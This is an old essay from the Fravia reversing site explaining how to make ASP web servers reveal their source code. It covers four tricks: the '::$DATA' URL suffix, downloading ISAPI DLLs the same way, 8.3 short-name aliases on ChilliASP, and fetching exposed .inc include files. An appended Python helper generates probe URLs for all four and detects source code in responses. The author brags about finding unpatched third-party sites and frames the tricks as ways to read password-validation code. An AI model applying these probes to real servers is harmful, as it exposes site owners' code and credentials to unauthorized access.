Hi Fravia,
I have been following your site for the last month, and all that I can
say is: it's Fantabulous!!
I have read the articles on CGI script cracking, but ASP (Active Server
Pages) cracking doesn't seem to have been discussed till now.
So I thought I should write something about this 'technology' from
our Micro$oft friends...
Regds,
Indian Maharaja
(Indian-Maharaja(at)usa(point)net)
Active Server Page reversing
By Indian Maharaja
Tools required: nothing but your browser.
When M$ launched Windoze NT Server, it was trying to compete against the
existing Unix platforms. Since Billy boy couldn't make much progress he had
the idea of 'bundling' software, to snare people who thought that all the
software was for 'free'. Among the many bloatwares that were launched were
SQL Server (an abomination of an RDBMS) and IIS (Internet Information
Server). Now M$ decided CGI was a worthless technology (since they couldn't
control it), so they launched something called ISAPI (Internet Server API).
If you look at the documentation for IIS, it mentions full support for CGI,
but you will find the documentation littered with references as to why
ISAPI is a million times greater and better than CGI.
Let's prove the opposite..:-)
So what really is ASP? It is available for download from the M$ website,
but it requires IIS or PWS (Personal Web Server) installed. (The install
exe is 9 megs+; if this isn't bloatware at its best then I am not
Maharaja.)
Basically ASP is itself an ISAPI extension (asp.dll) that allows server-side
scripting in VeeBee Script or JavaScript (sorry, JScript -- the M$ version
of JavaScript).
A very simple ASP script is something like:
<HTML>
<%Response.Write("Hello")%>
</HTML>
which will result in HTML like:
<HTML>
Hello
</HTML>
which is downloaded to the client's machine. So if I do a view-source I can
see only the resultant HTML and not the ASP code, as the ASP is translated
to HTML on the server and only the result is sent.
So what people generally do is keep all the code for validating passwords
and redirecting to hidden pages inside the ASP file, and based on some user
input show only the required things to the user. Even if the user does a
view-source he can see only the downloaded HTML.
It would be very nice if we could see the ASP source...
There are very many sites using ASP and still more sites using ISAPI DLLs.
Since ASP is itself an ISAPI extension, it is possible to write your own
ISAPI DLLs using VeeCee++ (version 5.0 has an AppWizard option for that)
and MFC, which can provide lower-level functionality than ASP.
If you find a page like this: www.indianmaharaja.com/default.asp =>
bull's-eye, this site uses ASP.
If you find a page like this: www.indianmaharaja.com/validate.dll?12473636
=> most probably it is an ISAPI DLL.
So let's get down to business...
1) If you are on an ASP page do this:
www.indianmaharaja.com/default.asp::$DATA
You will find that either the ASP code is displayed in your browser window
(or) a download window pops up which allows you to download the ASP.
So much for code security.
It seems it's a bug in ISAPI and a fix is available at M$ sites.
All the Micro$oft sites have run this fix :-( . But I found many, many
other web sites who are still running the unfixed version :-).
2) Next I checked out a site which was using an ISAPI DLL. I tried doing
this:
www.indianmaharaja.com/validate.dll
(entering just the name of the DLL) -- nope, I got a message:
'Hackers keep off'
Too bad, so I tried the trick specified in 1):
www.indianmaharaja.com/validate.dll::$DATA
Bingo! I was able to download the DLL.
I racked my brains as to how such a HUGE security hole could be there; I
still haven't been able to figure it out. Most probably it is because of
lousy coding done by the M$-loving bozos, or it was there for some devious
reason known only to M$.
3) The story doesn't end here... my next assignment was running ASP on
Apache Server for NT. M$ never provided a version of ASP (i.e. ISAPI) for
web servers other than IIS. A company called ChilliSoft provides a version
called ChilliASP which runs on Apache for NT (I don't know why anybody
would want to run ASP in the first place). ChilliASP is available for
download from M$'s Site Builder Network site.
Now if you have an ASP file with a long file name, say:
www.indianmaharaja.com/passwordval.asp
and you type the 8.3 short file name in the browser:
www.indianmaharaja.com/passwo~1.asp
-- unbelievably, the download window pops up and you can download the ASP
script.
I have noticed this problem only in the Apache version of ASP. Though a fix
might be available now (I am not sure), there could be many sites....
4) One more screw-up, the one most commonly made by the person who wrote
the ASP scripts. Sometimes when I do a view-source of a .asp file in my
browser I get something like this along with the HTML:
<!--#include file = "inc/encrypt.inc"-->
<!--#include file = "inc/AdminChk.inc"-->
<HTML>
.
.
Other stuff
.
.
</HTML>
What the bozo who created the page has done is put some common ASP code
(like validation routines which are used across pages) in a .inc file.
By default IIS has no script mapping for .inc, so it serves such a file
as plain text instead of running it.
Now if the page being viewed was:
www.indianmaharaja.com/login.asp
just type in:
www.indianmaharaja.com/inc/encrypt.inc
and your browser will promptly download this file.
Open the file and you have something like this:
<SCRIPT RUNAT=SERVER>
Function Encrypt(theStr)
..
..
..
End Function
</SCRIPT>
What you will see is the complete ASP code.
Hope you find this information useful in the continuing battle against
Billy's boys at Micro$oft.
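The four checks above (the ::$DATA stream trick, the same trick against an ISAPI DLL, the 8.3 short-name alias, and the leaked .inc include) as one probing helper, added here as an illustrative example and not code from the original essay. It builds the candidate URLs for a page and classifies a fetched response body; it does no fetching itself, so it runs offline with whatever HTTP client you use. The host name www.indianmaharaja.com is the essay's own placeholder, the sample bodies in the demo are constructed, and the 8.3 name generation is a simplification of the Windows rules (first six valid characters, ~N, three-character extension). The ::$DATA case works because NTFS resolves name::$DATA to the file's default data stream while the web server picks its handler by extension, and .asp::$DATA matches no script map, so an unpatched server sent the raw file as a static download.

```python
# Added example: helpers for the four ASP source-disclosure checks
# described above. Builds the probe URLs and classifies a response body;
# it performs no network requests itself. All URLs and sample bodies
# below are constructed for illustration.
import posixpath
import re
from urllib.parse import urlsplit, urlunsplit

# Server-side constructs that a correctly rendered ASP page never sends
# to the browser: script delimiters, server-side script blocks, and
# include directives that were meant to be resolved on the server.
INCLUDE_RE = re.compile(
    r'<!--\s*#include\s+(file|virtual)\s*=\s*"([^"]+)"\s*-->', re.IGNORECASE)
SOURCE_MARKERS = (
    re.compile(r"<%"),
    re.compile(r"<script[^>]*\brunat\s*=\s*[\"']?server", re.IGNORECASE),
    INCLUDE_RE,
)


def _with_path(url, path):
    """Rebuild url with a new path; query and fragment are dropped."""
    parts = urlsplit(url)
    return urlunsplit(parts._replace(path=path, query="", fragment=""))


def data_stream_variant(url):
    """Checks 1 and 2: request the NTFS default data stream of the file.
    The handler is chosen by extension and '.asp::$DATA' matches no script
    map, so an unpatched IIS served the raw file as static content."""
    return _with_path(url, urlsplit(url).path + "::$DATA")


def short_name_candidates(url, count=1):
    """Check 3: 8.3 short-name aliases for the last path component.
    Simplified Windows rules (assumption): drop characters outside
    [A-Za-z0-9_-], keep the first six, append ~N, truncate the extension
    to three characters. A name that already fits 8.3 gets no alias, so
    an empty list is returned. N depends on which other files share the
    same six-character prefix, hence a list of candidates."""
    directory, name = posixpath.split(urlsplit(url).path)
    stem, dot, ext = name.rpartition(".")
    if not dot:
        stem, ext = name, ""
    base = re.sub(r"[^A-Za-z0-9_-]", "", stem)
    if base == stem and len(base) <= 8 and len(ext) <= 3:
        return []
    suffix = "." + ext[:3] if ext else ""
    return [_with_path(url, posixpath.join(directory, f"{base[:6]}~{n}{suffix}"))
            for n in range(1, count + 1)]


def leaked_includes(page_url, html):
    """Check 4: resolve include directives that survived into the client-side
    HTML. 'file' paths are relative to the page's directory, 'virtual' paths
    to the web root."""
    page_dir = posixpath.dirname(urlsplit(page_url).path)
    targets = []
    for kind, path in INCLUDE_RE.findall(html):
        if kind.lower() == "virtual":
            target = path if path.startswith("/") else "/" + path
        else:
            target = posixpath.normpath(posixpath.join(page_dir, path))
        targets.append(_with_path(page_url, target))
    return targets


def looks_like_server_source(body):
    """True when a fetched body contains constructs that belong only in
    server-side source, i.e. the probe returned the script, not its output."""
    return any(marker.search(body) for marker in SOURCE_MARKERS)


def probe_plan(page_url, html=""):
    """All candidate URLs for one page, labelled by the check they belong to."""
    plan = [("ntfs-data-stream", data_stream_variant(page_url))]
    plan += [("8.3-short-name", u) for u in short_name_candidates(page_url, 2)]
    plan += [("leaked-include", u) for u in leaked_includes(page_url, html)]
    return plan


if __name__ == "__main__":
    # Constructed view-source of a page that leaked its include directives.
    rendered = ('<!--#include file = "inc/encrypt.inc"-->\n'
                '<!--#include file = "inc/AdminChk.inc"-->\n'
                '<HTML>\nHello\n</HTML>\n')
    for label, url in probe_plan("http://www.indianmaharaja.com/passwordval.asp", rendered):
        print(f"{label:18} {url}")
    # A fetched body is then classified, e.g. the raw script from check 1:
    print(looks_like_server_source('<HTML>\n<%Response.Write("Hello")%>\n</HTML>'))
```

Fetch each planned URL, then run the body through looks_like_server_source: the normal page should come back as rendered HTML, so any hit on a variant is a disclosure. The short-name list only covers the collision-free ~1, ~2 cases; on a directory with many files sharing a prefix, raise count.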